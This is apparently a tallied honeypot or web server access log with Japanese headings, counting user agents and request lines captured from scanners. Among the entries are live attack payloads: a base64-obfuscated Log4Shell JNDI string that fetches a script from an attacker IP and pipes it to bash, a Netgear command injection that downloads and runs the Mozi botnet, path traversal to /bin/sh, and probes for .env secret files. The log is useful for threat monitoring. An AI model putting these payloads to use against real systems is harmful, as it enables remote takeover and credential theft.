1 ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMy42Ny40NC4yMzQ6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTMuNjcuNDQuMjM0OjgwKXxiYXNo}
17 -
1 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; MSN Companion 2.0; 800x600; Compaq)
1 Mozilla/5.0 (Linux; Android 5.1; HUAWEI CUN-L22 Build/HUAWEICUN-L22; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/62.0.3202.84 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; Android 7.0; ASUS_X008DC Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
7 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
33 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
1 Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.66 Safari/537.36
21 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
12 Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)
1 Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Mobile/10B329
1 Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数 Method Request Protocol
4 -
3 \x03
1 \x16\x03\x01\x01\xfb\x01
4 \x16\x03\x01
1 CONNECT 85[.]206[.]160[.]115:80 HTTP/1.1
1 CONNECT hotmail-com.olc[.]protection[.]outlook[.]com:25 HTTP/1.1
1 CONNECT www[.]bing[.]com:443 HTTP/1.1
22 GET /.env HTTP/1.1
1 GET /13.67.44.234/.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?x=${jndi:ldap://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMy42Ny40NC4yMzQ6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTMuNjcuNDQuMjM0OjgwKXxiYXNo} HTTP/1.1
3 GET /HNAP1 HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /app/config/.env HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /audio/.env HTTP/1.1
1 GET /backend/.env HTTP/1.1
1 GET /base/.env HTTP/1.1
1 GET /blog/.env HTTP/1.1
1 GET /cgi-bin/.env HTTP/1.1
1 GET /conf/.env HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /crm/.env HTTP/1.1
1 GET /database/.env HTTP/1.1
3 GET /evox/about HTTP/1.1
1 GET /fbd/js/app.f2dc9c23.js?67869 HTTP/1.1
1 GET /fbd/js/app.f2dc9c23.js HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /library/.env HTTP/1.1
1 GET /local/.env HTTP/1.1
1 GET /new/.env HTTP/1.1
1 GET /newsite/.env HTTP/1.1
1 GET /nmaplowercheck1640266678 HTTP/1.1
1 GET /nmaplowercheck1640268892 HTTP/1.1
1 GET /nmaplowercheck1640273762 HTTP/1.1
1 GET /old/.env HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /protected/.env HTTP/1.1
1 GET /public/.env HTTP/1.1
2 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /sites/all/libraries/mailchimp/.env HTTP/1.1
1 GET /solr/ HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /src/.env HTTP/1.1
1 GET /storage/.env HTTP/1.1
1 GET /template/desktop/js/vlxx.js?v=2 HTTP/1.1
1 GET /vendor/.env HTTP/1.1
1 GET /vendor/laravel/.env HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-admin/.env HTTP/1.1
1 GET /wp-content/.env HTTP/1.1
1 GET /wp-content/themes/wp-porn/style.css HTTP/1.1
1 GET /wp-content/uploads/2021/12/Gai-toc-xu-lon-to-dam-dang-nhung-cuoc-hoang-dam-khong-diem-dung-320x225.png HTTP/1.1
1 GET /www/.env HTTP/1.1
1 GET http[:]//www[.]1ucn[.]com/proxychecker/index.php HTTP/1.1
1 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1
1 HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1
1 HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1
1 HEAD /icons/sphere1.png HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
3 POST /sdk HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//karenbaylor[.]site/2d71b47d622f9cffd7a7bd651f7cdd670d0f590e68cdc8de86fab5a61af2b37d5616143c0a2588ceda4493603fd1226790b4773712917e849bddef3f84f21a3fd1ae0bafe45bab55e18d117d143835733249e2b6c6651aa654605affb12f779a HTTP/1.1